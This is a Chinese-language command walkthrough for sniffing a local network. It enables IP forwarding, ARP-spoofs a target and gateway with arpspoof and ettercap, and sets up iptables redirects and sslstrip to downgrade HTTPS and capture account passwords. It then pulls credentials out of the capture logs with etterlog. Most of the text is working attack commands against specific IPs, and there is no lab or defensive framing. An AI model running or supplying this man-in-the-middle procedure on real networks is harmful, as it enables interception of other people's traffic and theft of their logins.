ettercap安装内网嗅探抓包

1、开启中间机器的转发功能 不然目标机器会断网
echo 1 > /proc/sys/net/ipv4/ip_forward

2、查看网关

ip route | grep default

 

3、安装arpspoof

apt install dsniff

arpspoof -i <interface> -t <target_ip> -r <gateway_ip>

这样目标的所有流量就经过了中间攻击机器

4、获取数据包

dsniff 或者 TCPdump urlsnarf 获取所有http请求

https://www.ettercap-project.org/downloads.html

wget https://github.com/Ettercap/ettercap/archive/v0.8.3.1.tar.gz

mkdir build

cd build

cmake ../           (yum install cmake)
make
make install

 

安装过程报各种错是因为很多依赖没有安装

安装依赖
yum install libnet-devel geoip-devel curl-devel libpcap-devel openssl-devel gtk3-devel ncurses ncurses-devel -y

ettercap -Tq -i eth0 |tee /tmp/log

 

 

抓取https

编辑   vim /etc/ettercap/etter.conf

1. #redir_command_on = \"iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport\"
2.  #redir_command_on = \"iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport\" 

去掉#   保存

IPV6也需要  

1. redir_command_on = \"ip6tables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport\"
2. redir_command_on = \"ip6tables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport\" 

不然报错    FATAL ERROR: Can't insert firewall redirects

去掉#   保存

然后运行sslstrip -a -f -k 实现https转换成http以获取帐号密码

 

ettercap -T -i eth0 -M arp:remote /10.0.0.200// /10.0.0.1// -q -w a.cap -l loginfo -L logall

etterlog -c logall.ecp -f /6.1.141.1//

etterlog -B -n -s -F TCP:10.0.0.200:50502:1.1.11.1:80 logall.ecp

etterlog -c logall.ecp 

 

etterlog -h

Usage: etterlog [OPTIONS] logfile

General Options:
-a, --analyze analyze a log file and return useful infos
-c, --connections display the table of connections
-f, --filter <TARGET> print packets only from this target
-t, --proto <proto> display only this proto (default is all)
-F, --filcon <CONN> print packets only from this connection
-s, --only-source print packets only from the source
-d, --only-dest print packets only from the destination
-r, --reverse reverse the target/connection matching
-n, --no-headers skip header information between packets
-m, --show-mac show mac addresses in the headers
-k, --color colorize the output
-l, --only-local show only local hosts parsing info files
-L, --only-remote show only remote hosts parsing info files

Search Options:
-e, --regex <regex> display only packets that match the regex
-u, --user <user> search for info about the user <user>
-p, --passwords print only accounts information
-i, --show-client show client address in the password profiles
-I, --client <ip> search for pass from a specific client

Editing Options:
-C, --concat concatenate more files into one single file
-o, --outfile <file> the file used as output for concatenation
-D, --decode used to extract files from connections

Visualization Method:
-B, --binary print packets as they are
-X, --hex print packets in hex mode
-A, --ascii print packets in ascii mode (default)
-T, --text print packets in text mode
-E, --ebcdic print packets in ebcdic mode
-H, --html print packets in html mode
-U, --utf8 <encoding> print packets in uft-8 using the <encoding>
-Z, --zero do not print packets, only headers
-x, --xml print host infos in xml format

Standard Options:
-v, --version prints the version and exit
-h, --help this help screen

 

etterlog 0.8.3.1 copyright 2001-2020 Ettercap Development Team

 

etterlog -c logall.ecp 查看所有连接

=======================================================

sslstrip 安装

sslstrip 使用python2编写  

安装 pip2   curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py

/bin/python get-pip.py

python -m pip install twisted

python -m pip install pyOpenSSL

git clone https://github.com/moxie0/sslstrip.git

 

 

python3支持安装

python3 -m pip install --upgrade pip  

https://github.com/K1M4K-ID/sslstrip_1.0/blob/main/sslstrip.tar.gz

python3 -m pip install pyOpenSSL

python3 -m pip install service_identity

 

 ====================================================================

# 查看连接

etterlog -c -t tcp log.ecp|awk '{print $2":"$4}'|sed '1,5d'|xargs -I {} etterlog -B -n -s -F TCP:{} log.ecp